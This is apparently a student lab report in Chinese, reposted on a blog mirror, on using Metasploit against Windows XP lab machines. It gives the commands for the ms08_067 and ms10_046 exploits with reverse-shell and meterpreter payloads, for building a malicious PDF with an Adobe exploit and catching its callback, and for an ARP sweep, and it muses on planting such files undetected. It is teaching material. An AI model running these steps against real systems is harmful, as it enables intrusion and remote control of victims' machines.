zoukankan      html  css  js  c++  java
  • 20155226《网络攻防》 Exp5 MSF基础应用

    20155226《网络攻防》 Exp5 MSF基础应用

    基础问题回答

    1、用自己的话解释什么是exploit,payload,encode?

    • exploit :
      Exploit的英文意思就是利用,在做攻击时,通常称为漏洞利用。
      一个利用程序(An exploit)就是一段通过触发一个漏洞(或者几个漏洞)进而控制目标系统的代码。

    • payload :
      payload属于名词,意为有效载荷,在病毒代码中实现一些有害的或者恶性的动作的部分叫做“有效负载”(payload)。
      payload可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。

    • encode :
      encode本意为编码,可在不改变payload功能的情况下对其进行编码,一些好的编码方式可以使攻击或相关的文件不被发现。

    实践内容

    一、主动攻击:ms08_067漏洞攻击

    • 实验前准备:将windows XP的防火墙关闭;KALI进入msfconsole界面。

    1、 先用 search ms08_067 指令查询针对该漏洞可以运用的攻击模块
    ,根据提示,使用 use exploit/windows/smb/ms08_067_netapi 使用该模块,并使用 show payloads 查看可以供我们使用的payload:

    • 可查看到有很多可以使用的正常的payload。

    2、 选择通过反向连接来获取shell的 generic/shell_reverse_tcp 作为payload,使用指令 set payload generic/shell_reverse_tcp 对payload进行设置,并使用show options查看:

    3、 发现源端口和目的端口是默认固定的,需要设置一个RHOST(靶机的IP地址)和一个LHOST(攻击机的IP地址)
    ,接着使用 exploit 指令开始攻击:

    5、攻击成功后获取了靶机的shell,此时可使用 systeminfo 指令查看靶机系统信息:

    二、对浏览器攻击:ms10_046漏洞攻击

    1、 利用search ms10_046指令查看可以运用的攻击模块,根据提示,使用 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 使用该模块,并使用show payloads查看:

    2、使用 set payload windows/meterpreter/reverse_tcp 设置payload,并使用show options查看参数:

    • SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址

    3、使用xp系统打开链接: http://192.168.147.141:80/

    • 此时kali显示接入一个会话:

    4、使用 sessions -i 1 选择会话1,成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:

    三、对Adobe的漏洞攻击

    • 首先还是先利用search adobe进行搜索
      ,然后进行选择,我选择的是use windows/fileformat/adobe_cooltype_sing
      ,又试了use windows/fileformat/adobe_flashplayer_button

    • 然后set payload windows/meterpreter/reverse_tcp查看所要配置的信息
      如图:

    输入如下代码,对LHOST,LPORT,FILENAME进行配置

    set LHOST 192.168.147.141
    set LPORT 5226
    set FILENAME 20155226-x.pdf
    
    • 输入exploit,生成20155226-x.pdf文件
      如图:

    • 全家福(心酸

    • 输入use exploit/multi/handler,进入监听,并设置监听端口,主机号

    • 在windows端,打开20155226-x.pdf,最后终于成功回连。。。

    四、辅助模块的应用

    • 使用 show auxiliary 查看可以运用的辅助模块:

    • 选择ARP扫描,使用命令: use scanner/discovery/arp_sweep ,只需设置目的主机IP即可,最后攻击成功:

    实验总结与体会

    • 辛辛苦苦安了5个虚拟机,在攻击adobe问题上我换了3个虚拟机3个漏洞,过程就很曲折,55555555
    • MSF确实比较好用,有各种各样的辅助功能,还待慢慢研究

    离实战还缺些什么技术或步骤?

    1、 在实践中发现MSF攻击的局限性很大,其中的漏洞几乎都是针对win XP系统,而实际应用的系统大部分是win7及以上的系统,如果需要实战攻击win7及以上的系统,还需要不断发现并成功利用新的漏洞。

    2、 在对Adobe的漏洞攻击中,需要把PDF文件植入被攻击主机,如果在不被发现植入危险的文件的情况下成功将攻击所需文件植入靶机,也是一个值得深思的问题。

  • 相关阅读:
    Reverse Integer
    Same Tree
    BST(Binary Search Tree)
    Maximum Depth of Binary Tree
    Single Number
    Computer System Basic Concept(2)
    破解企业QQ对个人QQ登陆的限制(原创)
    鸟哥的Linux私房菜.基础学习篇(摘要)(持续更新)
    Linux系列书籍
    【总结】关于彩虹表学习阶段性总结
  • 原文地址:https://www.cnblogs.com/20155226thy/p/8964986.html
Copyright © 2011-2022 走看看